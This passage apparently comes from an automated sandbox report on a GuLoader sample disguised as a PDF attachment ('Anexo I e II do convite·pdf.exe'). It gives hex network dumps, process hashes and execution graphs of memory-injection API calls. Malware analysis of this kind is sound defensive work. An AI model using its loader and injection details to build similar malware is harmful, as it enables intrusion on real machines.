                      Data Ascii: .|FP0pj[6slm$HQB&J;MR*^N;:54k_kVN73Z${QP_oZk!@]U7~k1mUDqW5RW0,</H.}]{lSj;dLbl3'd-ut_Zt}}yi:_^Q7mx DK5\khxz6J,D3l
                      2021-11-30 14:33:59 UTC100INData Raw: 28 8a 3f 87 e2 6a a8 50 84 69 fc 91 0b df cc e2 9f a1 42 ea ea 37 8a 34 35 7d 6e 93 f6 37 f8 a9 52 5c b7 39 6e 32 d7 f2 49 23 8a 4d 73 48 6c b1 f4 a3 97 8b a9 03 e0 2e ad 3d 5f 21 2f ba 49 4b 2b d7 d4 77 ba fe 7f 93 e1 ea e4 73 b4 d4 e2 b6 7f 92 d1 df d0 69 47 70 e7 9a cc 36 dd 75 ba 05 8d 58 78 eb 32 73 62 ad af 13 c1 fb 75 a3 70 45 86 8e 9a 6e 76 a5 e3 0c 75 58 df d5 58 c8 5b 97 ae e9 df c3 bd 4a a9 66 a1 2e 2e 92 90 4d 19 cf 6b 87 55 94 d7 ba 80 42 97 6a 5b 71 8d 01 6e c3 0c 26 fe 8d 5d 59 0f b2 0d 5b 50 4a 96 f8 e1 d0 0f ee 7b bd db 4e c1 9f 6d 20 ce b8 67 44 36 15 b3 a7 f3 1c 50 3b 72 d3 80 98 91 92 42 74 f4 35 03 45 f5 ed 9b 27 83 f7 28 25 57 b2 9d f7 49 db 77 10 e6 a5 f7 7d 14 43 86 c4 38 3a a0 7d cf f9 61 14 b5 a1 bd be c1 6f 34 83 de 14 d1 8d 0e
                      Data Ascii: (?jPiB745}n7R\9n2I#MsHl.=_!/IK+wsiGp6uXx2sbupEnvuXX[Jf..MkUBj[qn&]Y[PJ{Nm gD6P;rBt5E'(%WIw}C8:}ao4
                      2021-11-30 14:33:59 UTC102INData Raw: c4 3d 0c 34 0f fb 53 12 bb a5 44 f6 f2 e4 6d 4e 47 04 6a aa b6 f8 75 f8 cd be 31 df 12 59 54 3b 55 26 3a 98 46 f7 ec 01 13 14 55 4f 7f 7d 83 ed be 1a 5d 61 de cc 21 df 6f 6a 3f 28 26 f1 96 a5 12 dc 1f de ef 14 ef c9 f3 f6 5b 0a f9 78 b5 37 d9 b4 78 72 04 7c 60 c6 fb 14 48 db 60 40 9e 8f 27 1f 0b 8c 8b ef a7 a6 4a 06 b9 ee f0 b1 dd a9 08 a9 7c 17 84 27 69 0f 82 a4 3a 16 7f 16 b5 24 68 6e c4 81 d2 92 72 44 d4 dd 3e dc 95 ea 92 ca 54 74 9b 39 ba 5f c9 ef dd f5 4e 88 3a 99 e9 29 d4 d6 4a 35 33 e9 31 4f 59 21 14 88 b4 60 c8 21 f8 90 ab a3 66 24 49 bf 01 a3 35 96 86 d5 87 42 c2 a0 05 84 5b 4c 0d 3a e9 45 a0 c2 37 8f 87 a2 f0 8e 73 07 c1 44 fc 76 3b 44 b3 86 60 58 c7 89 49 d7 2c 9b 93 ba 64 2d f9 0b 24 d5 30 b8 45 8d 95 25 dc 04 b5 18 36 56 65 7e 28 8a 3f 87 e2
                      Data Ascii: =4SDmNGju1YT;U&:FUO}]a!oj?(&[x7xr|`H`@'J|'i:$hnrD>Tt9_N:)J531OY!`!f$I5B[L:E7sDv;D`XI,d-$0E%6Ve~(?
                      2021-11-30 14:33:59 UTC103INData Raw: 10 8b 4c 5c 3d bc 1c cc a3 2b 78 68 62 44 62 9b 00 54 28 77 35 74 9e bb 63 3c 3d da 55 16 25 b4 59 58 4b 0d 02 f4 a8 96 25 6e 8a 52 40 3f 56 b3 ae a9 55 5c d7 ed 16 1d 76 2d 85 2e e1 01 3c 90 19 4c 21 60 bc 77 33 6f be ee 74 bf ea c3 18 a3 09 1c 98 ab c7 86 42 08 3b 37 c8 17 97 fc e8 74 32 93 56 9f f2 c5 97 e6 5f 95 d7 c5 57 a0 98 30 2c e3 3c 2f 48 05 e0 2e 18 7d 5d 7b 6c 53 6a 3b 85 fb a4 da e8 e5 64 91 4c 11 62 b5 6c e2 db a2 ba 05 82 33 8e b7 fa 85 cc e8 9b 27 64 2d 05 86 75 74 cf b3 d3 5f bc ed b4 1f da 58 f6 b6 8b af 51 58 b4 4e 60 39 55 62 cc 08 73 bb 0e 40 73 62 b0 1e 96 bb af 51 78 93 a5 20 87 32 43 3c 19 3d 09 85 d2 a4 04 e1 63 cc bc d9 b9 6e 68 3a 19 e1 50 85 23 3d 36 75 46 07 d3 8e ec cf bc 28 e6 f8 69 a1 54 cf 00 90 45 a7 17 18 c4 5d 9c a4 9f
                      Data Ascii: L\=+xhbDbT(w5tc<=U%YXK%nR@?VU\v-.<L!`w3otB;7t2V_W0,</H.}]{lSj;dLbl3'd-ut_XQXN`9Ubs@sbQx 2C<=cnh:P#=6uF(iTE]
                      2021-11-30 14:33:59 UTC104INData Raw: 93 f6 7f 68 a8 52 10 e7 38 6e 7e 58 f3 49 23 8a 4d 73 48 6c b1 f4 f1 07 8a a9 1b b0 2f ad 3d 5f 21 2f ba 49 4b 2b d7 d4 77 ba fe 7f 93 e1 ea e4 73 b4 26 6d b7 7f 74 5e de d0 b3 c8 71 e7 50 43 37 dd cf 35 04 8d 58 78 eb 32 7b 62 ad 2f 15 c1 fb f5 a1 70 45 06 8e 9a 6e 76 35 6c 0d 75 c6 50 d4 58 cb 5b 97 2e 9a df c3 3d 5d a9 66 21 3d 2e 92 10 5d 19 cf eb 83 55 94 57 ba 80 42 97 5e cb 70 8d 13 fe c2 0c 04 6e 8c 5d 59 0f b2 0d d2 50 2d f3 8c 80 b4 6b 9c 12 d3 bd 21 c1 17 6d 46 bc dd 02 25 52 71 c1 ce 9d 7a 3f 3b 72 84 d3 aa ce a1 70 5a 90 59 6f 45 f5 ef 99 60 e6 83 64 44 24 c6 d8 85 3b b4 05 10 e6 d6 f3 2e 71 37 ca a5 4b 4e e5 0f bd 96 13 14 b5 6a bf f6 a4 0e 44 c2 b2 78 be ee 0e 1e e5 ab 32 a8 22 da 0a 59 8d a8 29 73 fb 78 83 ea 3c e3 d6 d9 1e 10 8b 4c 5c 3d
                      Data Ascii: hR8n~XI#MsHl/=_!/IK+ws&mt^qPC75Xx2{b/pEnv5luPX[.=]f!=.]UWB^pn]YP-k!mF%Rqz?;rpZYoE`dD$;.q7KNjDx2"Y)sx<L\=
                      2021-11-30 14:33:59 UTC106INData Raw: 02 ac 2d 54 71 55 b6 aa 08 d6 c7 f2 47 83 84 c5 df ff 43 83 98 4a 8a cd df aa cc 6b df cb ea 01 28 53 0b 06 35 b6 4c 8f 4e 8e 91 2f c6 77 27 6d fc 06 f3 82 de 13 82 8e 8d 94 ec f0 56 6b 84 d8 4b f0 d0 0e 1f b7 8f 9b 1c 1b 7f 37 36 da 96 29 7e 60 21 4d 39 98 39 ec 87 14 b0 e2 84 0d 61 ea c6 b6 da 64 e9 a2 a1 15 4d 19 43 bc 8c 1a 0d b5 4a 09 7e 08 41 d8 a5 14 ae 35 9f 5f 74 1f 3b 84 41 3a 99 e9 29 d4 d6 4a 35 33 e9 31 4f 59 21 14 88 b4 60 c8 21 f8 90 ab a3 66 24 49 bf 01 a3 35 96 86 d5 87 42 c2 a0 05 84 5b 4c 0d 3a e9 45 a0 c2 37 8f 87 a2 f0 8e 73 07 c1 44 fc 76 3b 44 b3 86 60 58 c7 89 49 d7 2c 9b 93 ba 64 2d f9 0b 24 d5 30 b8 45 8d 95 25 dc 04 b5 18 36 56 65 7e 28 8a 3f 87 e2 6a a8 50 84 6d 6c 90 0b df 9c e3 9f 21 cd eb ea 37 8a 34 35 7d 6e 93 f6 7f 68 a8
                      Data Ascii: -TqUGCJk(S5LN/w'mVkK76)~`!M99adMCJ~A5_t;A:)J531OY!`!f$I5B[L:E7sDv;D`XI,d-$0E%6Ve~(?jPml!745}nh
                      2021-11-30 14:33:59 UTC107INData Raw: da 55 16 25 b4 59 58 4b 0d 02 f4 a8 96 25 6e 8a 52 40 3f 56 b3 ae a9 55 5c d7 ed 16 1d 76 2d 85 2e e1 01 3c 90 19 4c 21 60 bc 77 33 6f be ee 74 bf ea c3 18 a3 09 1c 98 ab c7 86 42 08 3b 37 c8 17 97 fc e8 74 32 93 56 9f f2 c5 97 e6 5f 95 d7 c5 57 a0 98 30 2c e3 3c 2f 48 05 e0 2e 18 7d 5d 7b 6c 53 6a 3b 85 fb a4 da e8 e5 64 91 4c 11 62 b5 6c e2 db a2 ba 05 82 33 8e b7 fa 85 cc e8 9b 27 64 2d 05 86 75 74 cf b3 d3 5f bc ed b4 1f da 58 f6 b6 8b af 51 58 b4 4e 60 39 55 62 cc 08 73 bb 0e 40 73 62 b0 1e 96 bb af 51 78 93 a5 20 87 32 43 3c 19 3d 09 85 d2 a4 04 e1 63 cc bc d9 b9 6e 68 3a 19 e1 50 85 23 3d 36 75 46 07 d3 8e ec cf bc 28 e6 f8 69 a1 54 cf 00 90 45 a7 17 18 c4 5d 9c a4 9f 6b c3 82 44 d1 60 d2 ad 74 fd de d7 94 fa 3a 26 68 e5 43 32 41 ee 02 ac 2d 54 71
                      Data Ascii: U%YXK%nR@?VU\v-.<L!`w3otB;7t2V_W0,</H.}]{lSj;dLbl3'd-ut_XQXN`9Ubs@sbQx 2C<=cnh:P#=6uF(iTE]kD`t:&hC2A-Tq
                      2021-11-30 14:33:59 UTC108INData Raw: b0 2f ad 3d 5f 21 2f ba 49 4b 2b d7 d4 77 ba fe 7f 93 e1 ea e4 73 b4 26 6d b7 7f 74 5e de d0 b3 c8 71 e7 50 43 37 dd cf 35 04 8d 58 78 eb 32 7b 62 ad 2f 15 c1 fb f5 a1 70 45 06 8e 9a 6e 76 35 6c 0d 75 c6 50 d4 58 cb 5b 97 2e 9a df c3 3d 5d a9 66 21 3d 2e 92 10 5d 19 cf eb 83 55 94 57 ba 80 42 97 5e cb 70 8d 13 fe c2 0c 04 6e 8c 5d 59 0f b2 0d d2 50 2d f3 8c 80 b4 6b 9c 12 d3 bd 21 c1 17 6d 46 bc dd 02 25 52 71 c1 ce 9d 7a 3f 3b 72 84 d3 aa ce a1 70 5a 90 59 6f 45 f5 ef 99 60 e6 83 64 44 24 c6 d8 85 3b b4 05 10 e6 d6 f3 2e 71 37 ca a5 4b 4e e5 0f bd 96 13 14 b5 6a bf f6 a4 0e 44 c2 b2 78 be ee 0e 1e e5 ab 32 a8 22 da 0a 59 8d a8 29 73 fb 78 83 ea 3c e3 d6 d9 1e 10 8b 4c 5c 3d bc 1c cc a3 2b 78 68 62 44 62 9b 00 54 28 77 35 74 9e bb 63 3c 3d da 55 16 25 b4
                      Data Ascii: /=_!/IK+ws&mt^qPC75Xx2{b/pEnv5luPX[.=]f!=.]UWB^pn]YP-k!mF%Rqz?;rpZYoE`dD$;.q7KNjDx2"Y)sx<L\=+xhbDbT(w5tc<=U%
                      2021-11-30 14:33:59 UTC109INData Raw: 6b df cb ea 01 28 53 0b 06 35 b6 4c 8f 4e 8e 91 2f c6 77 27 6d fc 06 f3 82 de 13 82 8e 8d 94 ec f0 56 6b 84 d8 4b f0 d0 0e 1f b7 8f 9b 1c 1b 7f 37 36 da 96 29 7e 60 21 4d 39 98 39 ec 87 14 b0 e2 84 0d 61 ea c6 b6 da 64 e9 a2 a1 15 4d 19 43 bc 8c 1a 0d b5 4a 09 7e 08 41 d8 a5 14 ae 35 9f 5f 74 1f 3b 84 41 3a 99 e9 29 d4 d6 4a 35 33 e9 31 4f 59 21 14 88 b4 60 c8 21 f8 90 ab a3 66 24 49 bf 01 a3 35 96 86 d5 87 42 c2 a0 05 84 5b 4c 0d 3a e9 45 a0 c2 37 8f 87 a2 f0 8e 73 07 c1 44 fc 76 3b 44 b3 86 60 58 c7 89 49 d7 2c 9b 93 ba 64 2d f9 0b 24 d5 30 b8 45 8d 95 25 dc 04 b5 18 36 56 65 7e 28 8a 3f 87 e2 6a a8 50 84 6d 6c 90 0b df 9c e3 9f 21 cd eb ea 37 8a 34 35 7d 6e 93 f6 7f 68 a8 52 10 e7 38 6e 7e 58 f3 49 23 8a 4d 73 48 6c b1 f4 f1 07 8a a9 1b b0 2f ad 3d 5f
                      Data Ascii: k(S5LN/w'mVkK76)~`!M99adMCJ~A5_t;A:)J531OY!`!f$I5B[L:E7sDv;D`XI,d-$0E%6Ve~(?jPml!745}nhR8n~XI#MsHl/=_


                      Code Manipulations

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      Analysis Process: Anexo I e II do convite#U00b7pdf.exe PID: 3144 Parent PID: 4244

                      General

                      Start time:15:33:05
                      Start date:30/11/2021
                      Path:C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"
                      Imagebase:0x400000
                      File size:115928 bytes
                      MD5 hash:E779A8BE256D298C6D96884724D7792B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Visual Basic
                      Yara matches:
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Author: Joe Security
                      Reputation:low

                      Chronological Activities

                      Analysis Process: Anexo I e II do convite#U00b7pdf.exe PID: 1304 Parent PID: 3144

                      General

                      Start time:15:33:31
                      Start date:30/11/2021
                      Path:C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"
                      Imagebase:0x400000
                      File size:115928 bytes
                      MD5 hash:E779A8BE256D298C6D96884724D7792B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000000.338047511.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                      Reputation:low

                      Chronological Activities

                      Disassembly

                      Code Analysis

                      Reset < >

                        Analysis Process: Anexo I e II do convite#U00b7pdf.exe PID: 3144 Parent PID: 4244 Anexo I e II do convite#U00b7pdf.exeCOMMON

                        Execution Graph

                        Execution Coverage:2.3%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:67.7%
                        Total number of Nodes:189
                        Total number of Limit Nodes:7

                        Graph

                        execution_graph 21392 20aef6b 21393 20aef34 21392->21393 21398 20acf76 21393->21398 21395 20af068 21396 20af607 CreateProcessInternalW 21395->21396 21397 20af647 21395->21397 21396->21397 21399 20acfa8 21398->21399 21400 20acfb8 21399->21400 21401 20a0fa4 21399->21401 21529 20ac6df GetPEB 21400->21529 21438 20abaaa 21401->21438 21403 20acfc4 21405 20acff8 21403->21405 21406 20afea4 21403->21406 21405->21395 21531 20a0f3e 11 API calls 21406->21531 21408 20a113c 21409 20afea9 21412 20a8a32 21413 20aeebc 10 API calls 21412->21413 21414 20a8a47 21413->21414 21416 20aeebc 10 API calls 21414->21416 21415 20abaaa 10 API calls 21422 20a0ff5 21415->21422 21417 20a8a5a 21416->21417 21418 20aeebc 10 API calls 21417->21418 21419 20a8abd 21418->21419 21419->21395 21420 20a0f3e 21528 20a0d03 11 API calls 21420->21528 21422->21408 21422->21412 21422->21415 21422->21420 21424 20aeebc 10 API calls 21422->21424 21425 20a82a5 21422->21425 21471 20adad0 21422->21471 21523 20aba35 GetPEB 21422->21523 21424->21422 21525 20aeebc 21425->21525 21427 20afaae 21427->21395 21428 20a8327 21428->21412 21428->21427 21429 20a8799 NtWriteVirtualMemory 21428->21429 21430 20a8814 21429->21430 21430->21412 21431 20aeebc 10 API calls 21430->21431 21432 20a8897 21431->21432 21432->21412 21433 20aeebc 10 API calls 21432->21433 21434 20a895e 21433->21434 21434->21412 21435 20a89c3 21434->21435 21436 20aeebc 10 API calls 21435->21436 21437 20a89fd 21436->21437 21437->21395 21441 20abae4 21438->21441 21439 20abcc2 LoadLibraryA 21439->21441 21440 20ac6df GetPEB 21440->21441 21441->21422 21441->21438 21441->21439 21441->21440 21442 20af992 21441->21442 21455 20a750e 21441->21455 21442->21422 21443 20adad0 9 API calls 21443->21455 21444 20aba35 GetPEB 21444->21455 21445 20a8a32 21446 20aeebc 9 API calls 21445->21446 21447 20a8a47 21446->21447 21449 20aeebc 9 API calls 21447->21449 21448 20abaaa 9 API calls 21448->21455 21450 20a8a5a 21449->21450 21451 20aeebc 9 API calls 21450->21451 21452 20a8abd 21451->21452 21452->21422 21453 20a0f3e 21532 20a0d03 11 API calls 21453->21532 21455->21442 21455->21443 21455->21444 21455->21445 21455->21448 21455->21453 21457 20aeebc 9 API calls 21455->21457 21458 20a82a5 21455->21458 21457->21455 21459 20aeebc 9 API calls 21458->21459 21461 20a8327 21459->21461 21460 20afaae 21460->21422 21461->21445 21461->21460 21462 20a8799 NtWriteVirtualMemory 21461->21462 21463 20a8814 21462->21463 21463->21445 21464 20aeebc 9 API calls 21463->21464 21465 20a8897 21464->21465 21465->21445 21466 20aeebc 9 API calls 21465->21466 21467 20a895e 21466->21467 21467->21445 21468 20a89c3 21467->21468 21469 20aeebc 9 API calls 21468->21469 21470 20a89fd 21469->21470 21470->21422 21472 20abaaa 9 API calls 21471->21472 21473 20adadd 21472->21473 21474 20abaaa 9 API calls 21473->21474 21475 20adaee 21474->21475 21476 20adb39 GetPEB 21475->21476 21477 20adb74 21476->21477 21533 20ae9c2 21477->21533 21479 20ae428 21479->21422 21480 20adc72 21480->21479 21481 20ae434 21480->21481 21482 20adf43 21480->21482 21483 20ae728 21481->21483 21484 20ae4e7 21481->21484 21495 20ae9c2 NtProtectVirtualMemory 21482->21495 21485 20ae951 21483->21485 21486 20a0fa4 21483->21486 21491 20ae9c2 NtProtectVirtualMemory 21484->21491 21487 20ae963 21485->21487 21507 20a0ff5 21485->21507 21488 20abaaa 9 API calls 21486->21488 21489 20ae9c2 NtProtectVirtualMemory 21487->21489 21488->21507 21490 20ae9bb 21489->21490 21490->21422 21494 20ae725 21491->21494 21492 20a113c 21493 20adad0 9 API calls 21493->21507 21494->21422 21495->21479 21496 20aba35 GetPEB 21496->21507 21497 20a8a32 21498 20aeebc 9 API calls 21497->21498 21499 20a8a47 21498->21499 21501 20aeebc 9 API calls 21499->21501 21500 20abaaa 9 API calls 21500->21507 21502 20a8a5a 21501->21502 21503 20aeebc 9 API calls 21502->21503 21504 20a8abd 21503->21504 21504->21422 21505 20a0f3e 21536 20a0d03 11 API calls 21505->21536 21507->21492 21507->21493 21507->21496 21507->21497 21507->21500 21507->21505 21509 20aeebc 9 API calls 21507->21509 21510 20a82a5 21507->21510 21509->21507 21511 20aeebc 9 API calls 21510->21511 21513 20a8327 21511->21513 21512 20afaae 21512->21422 21513->21497 21513->21512 21514 20a8799 NtWriteVirtualMemory 21513->21514 21515 20a8814 21514->21515 21515->21497 21516 20aeebc 9 API calls 21515->21516 21517 20a8897 21516->21517 21517->21497 21518 20aeebc 9 API calls 21517->21518 21519 20a895e 21518->21519 21519->21497 21520 20a89c3 21519->21520 21521 20aeebc 9 API calls 21520->21521 21522 20a89fd 21521->21522 21522->21422 21524 20aba73 21523->21524 21524->21422 21526 20aeeee 21525->21526 21537 20aeef5 11 API calls 21526->21537 21530 20ac6f1 21529->21530 21530->21403 21531->21409 21534 20aea2a NtProtectVirtualMemory 21533->21534 21534->21480 21538 20a2969 21539 20a2901 TerminateProcess 21538->21539 21541 20ad6eb 21539->21541 21542 20ac6df GetPEB 21541->21542 21543 20ad6f5 21542->21543 21544 20a1c8f 21545 20a19c9 21544->21545 21547 20a1c9c 21544->21547 21546 20a1cdb 21547->21546 21548 20ac6df GetPEB 21547->21548 21549 20ad6f5 21548->21549 21550 20a919f 21551 20a9212 CreateFileA 21550->21551 21553 20aea7f 21554 20aea81 NtProtectVirtualMemory 21553->21554 21555 20a1b6d 21556 20a1bea 21555->21556 21557 20ac6df GetPEB 21556->21557 21559 20a1cdb 21556->21559 21558 20ad6f5 21557->21558 21560 40131c #100 21561 401347 21560->21561 21562 20a9747 21563 20a9749 NtAllocateVirtualMemory 21562->21563 21564 20a9781 21563->21564 21565 20a0e17 EnumWindows 21566 20a0e38 21565->21566 21567 20af7d5 21568 20abaaa 21567->21568 21570 20abcc2 LoadLibraryA 21568->21570 21571 20ac6df GetPEB 21568->21571 21573 20af992 21568->21573 21585 20a750e 21568->21585 21569 20adad0 11 API calls 21569->21585 21570->21568 21571->21568 21572 20aba35 GetPEB 21572->21585 21574 20a8a32 21575 20aeebc 11 API calls 21574->21575 21576 20a8a47 21575->21576 21578 20aeebc 11 API calls 21576->21578 21577 20abaaa 11 API calls 21577->21585 21579 20a8a5a 21578->21579 21581 20aeebc 11 API calls 21579->21581 21580 20aeebc 11 API calls 21580->21585 21582 20a8abd 21581->21582 21583 20a0f3e 21600 20a0d03 11 API calls 21583->21600 21585->21569 21585->21572 21585->21573 21585->21574 21585->21577 21585->21580 21585->21583 21587 20a82a5 21585->21587 21588 20aeebc 11 API calls 21587->21588 21590 20a8327 21588->21590 21589 20afaae 21590->21574 21590->21589 21591 20a8799 NtWriteVirtualMemory 21590->21591 21592 20a8814 21591->21592 21592->21574 21593 20aeebc 11 API calls 21592->21593 21594 20a8897 21593->21594 21594->21574 21595 20aeebc 11 API calls 21594->21595 21596 20a895e 21595->21596 21596->21574 21597 20a89c3 21596->21597 21598 20aeebc 11 API calls 21597->21598 21599 20a89fd 21598->21599

                        Executed Functions

                        Function 020ADAD0, Relevance: 11.8, APIs: 1, Strings: 5, Instructions: 1317COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 20adad0-20adca0 call 20abaaa * 2 call 20afb47 GetPEB call 20ae9c2 15 20ae428-20ae42e 0->15 16 20adca6-20ade9f 0->16 24 20adea3-20adeb0 16->24 25 20adeb6-20adf10 24->25 26 20ae434-20ae43c 24->26 25->24 31 20adf12-20adf26 25->31 27 20ae440-20ae44d 26->27 29 20ae728-20ae764 27->29 30 20ae453-20ae464 27->30 35 20ae768-20ae775 29->35 30->27 33 20ae466-20ae4c9 30->33 31->24 34 20adf2c-20adf3d 31->34 33->27 40 20ae4cf-20ae4e1 33->40 34->24 37 20adf43-20adfc5 34->37 38 20ae93b-20ae94b 35->38 39 20ae77b-20ae7a0 35->39 51 20adfc9-20adffa 37->51 44 20ae951-20ae95d 38->44 45 20a0fa4-20a1116 call 20abaaa 38->45 39->35 42 20ae7a2-20ae7b3 39->42 40->27 43 20ae4e7-20ae585 40->43 42->35 47 20ae7b5-20ae811 42->47 61 20ae588-20ae59c 43->61 49 20a750e-20a7a34 call 20adad0 call 20a796b call 20aba35 call 20aeebc 44->49 50 20ae963-20ae9bb call 20ae9c2 44->50 94 20a1148-20a114a 45->94 95 20a113c 45->95 47->35 67 20ae817-20ae86b 47->67 133 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 49->133 134 20a8a32-20a8b3d call 20aeebc * 3 49->134 57 20ae000-20ae060 51->57 58 20ae097-20ae0a7 51->58 66 20ae0c6-20ae0d6 57->66 65 20ae0a9-20ae0c5 58->65 58->66 72 20ae5a2-20ae5b9 61->72 73 20ae6c4-20ae6f6 61->73 65->66 70 20ae28c-20ae29f 66->70 71 20ae0dc-20ae136 66->71 76 20ae870-20ae882 67->76 78 20ae39d-20ae3cb 70->78 79 20ae2a5-20ae302 70->79 71->70 89 20ae13c-20ae196 71->89 82 20ae5bb-20ae5cd 72->82 83 20ae5d3-20ae650 72->83 73->61 81 20ae6fc-20ae725 call 20ae9c2 73->81 85 20ae8d1-20ae935 76->85 86 20ae884-20ae8d0 76->86 78->51 90 20ae3d1-20ae423 call 20ae9c2 78->90 79->78 101 20ae308-20ae39a 79->101 82->83 92 20ae652-20ae6c3 82->92 83->73 85->38 85->76 86->85 109 20ae198-20ae1fb 89->109 90->15 92->73 94->95 97 20a114c-20a1152 94->97 97->49 101->78 115 20ae1fd-20ae213 109->115 115->109 117 20ae215-20ae283 115->117 117->109 121 20ae289-20ae28a 117->121 121->70 133->134 165 20a7f06-20a7fd3 133->165 168 20a7fd9-20a80ce call 20aeebc 165->168 169 20a0f3e-20a0f60 call 20a0d4c 165->169 168->134 176 20a80d4-20a829f 168->176 176->49 181 20a82a5-20a8383 call 20aeebc 176->181 181->134 186 20a8389-20a83e9 181->186 186->134 188 20a83ef-20a8425 186->188 189 20a848c-20a84b7 188->189 190 20a8427-20a8486 188->190 189->134 192 20a84bd-20a85f2 189->192 190->134 190->189 196 20a85f8-20a8713 call 20ac2a3 192->196 197 20afaae-20afab2 192->197 196->134 206 20a8719-20a87e2 call 20afaae NtWriteVirtualMemory 196->206 199 20afab3-20afb3c 197->199 205 20afb42-20afb44 199->205 210 20a8814-20a881c 206->210 210->134 211 20a8822-20a88f2 call 20aeebc 210->211 211->134 216 20a88f8-20a89c1 call 20aeebc 211->216 216->134 221 20a89c3-20a89fd call 20aeebc 216->221
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoadMemoryProtectVirtual
                        • String ID: 0wYf$FE4$FSVC$Nx|M$`\oJ
                        • API String ID: 3389902171-675379545
                        • Opcode ID: ec11acf02f066fce7c84fdb38729af6d94fafea84b63d8f36645457df9d5b107
                        • Instruction ID: c747f0c1b2721933a1d1293a2b685364a0b294256b32eb83e25d1f2f7b0c5366
                        • Opcode Fuzzy Hash: ec11acf02f066fce7c84fdb38729af6d94fafea84b63d8f36645457df9d5b107
                        • Instruction Fuzzy Hash: AFC20171608385CFCB759F78C8A87DEBBA2BF55350F85816EDC8A8B251D3308A41CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A0494, Relevance: 9.7, APIs: 2, Strings: 3, Instructions: 907COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 224 20a0494-20a04d5 226 20a04db-20a0614 call 20a9461 call 20abaaa 224->226 227 20a0fa4-20a1116 call 20abaaa 224->227 248 20a061e-20a068d 226->248 249 20a0619 call 20abaaa 226->249 239 20a1148-20a114a 227->239 240 20a113c 227->240 239->240 241 20a114c-20a1152 239->241 243 20a750e-20a7a34 call 20adad0 call 20a796b call 20aba35 call 20aeebc 241->243 313 20a7a3a-20a7f00 call 20abaaa call 20aeebc call 20a8b48 call 20ab8c3 call 20aeebc 243->313 314 20a8a32-20a8b3d call 20aeebc * 3 243->314 254 20af8b8-20af8cb call 20a0692 248->254 249->248 260 20afa8f-20afaab 254->260 261 20af8d1-20af90c 254->261 265 20abaaa-20abbd2 261->265 266 20af912-20af91c 261->266 280 20abbd8-20abcbf call 20ac6df call 20abcce 265->280 281 20abcc2-20abccd LoadLibraryA call 20abcce 265->281 266->260 269 20af922-20af926 266->269 269->260 272 20af92c-20af930 269->272 272->260 275 20af936-20af93a 272->275 275->260 278 20af940-20af944 275->278 278->260 282 20af94a-20af94e 278->282 280->281 281->254 282->260 287 20af954-20af98c 282->287 287->243 294 20af992-20af99c 287->294 294->260 297 20af9a2-20af9b3 294->297 298 20af9b4-20af9f7 297->298 304 20af9f9-20af9fd 298->304 305 20afa06-20afa8c 298->305 304->260 308 20afa03-20afa04 304->308 308->298 313->314 345 20a7f06-20a7fd3 313->345 348 20a7fd9-20a80ce call 20aeebc 345->348 349 20a0f3e-20a0f60 call 20a0d4c 345->349 348->314 356 20a80d4-20a829f 348->356 356->243 361 20a82a5-20a8383 call 20aeebc 356->361 361->314 366 20a8389-20a83e9 361->366 366->314 368 20a83ef-20a8425 366->368 369 20a848c-20a84b7 368->369 370 20a8427-20a8486 368->370 369->314 372 20a84bd-20a85f2 369->372 370->314 370->369 376 20a85f8-20a8713 call 20ac2a3 372->376 377 20afaae-20afab2 372->377 376->314 386 20a8719-20a881c call 20afaae NtWriteVirtualMemory 376->386 379 20afab3-20afb3c 377->379 385 20afb42-20afb44 379->385 386->314 391 20a8822-20a88f2 call 20aeebc 386->391 391->314 396 20a88f8-20a89c1 call 20aeebc 391->396 396->314 401 20a89c3-20a89fd call 20aeebc 396->401
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateLibraryLoadMemoryVirtual
                        • String ID: 0wYf$FSVC$Nx|M
                        • API String ID: 2616484454-3280496369
                        • Opcode ID: bc150284c2d6b3f7affa5ffd5e9828dbdebbeee5d0853fdd45f6eb430bc9dfbe
                        • Instruction ID: dc991fd74d37b088c17ae73be8d9469e9276aa0b0e871d0c6bac9ac6e39ebcc5
                        • Opcode Fuzzy Hash: bc150284c2d6b3f7affa5ffd5e9828dbdebbeee5d0853fdd45f6eb430bc9dfbe
                        • Instruction Fuzzy Hash: 2C82F1B1608389DFCB648FB8C9657EE7BB2FF55340F95812ADC4A9B210D7709A41CB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A70A8, Relevance: 9.6, APIs: 1, Strings: 4, Instructions: 825COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
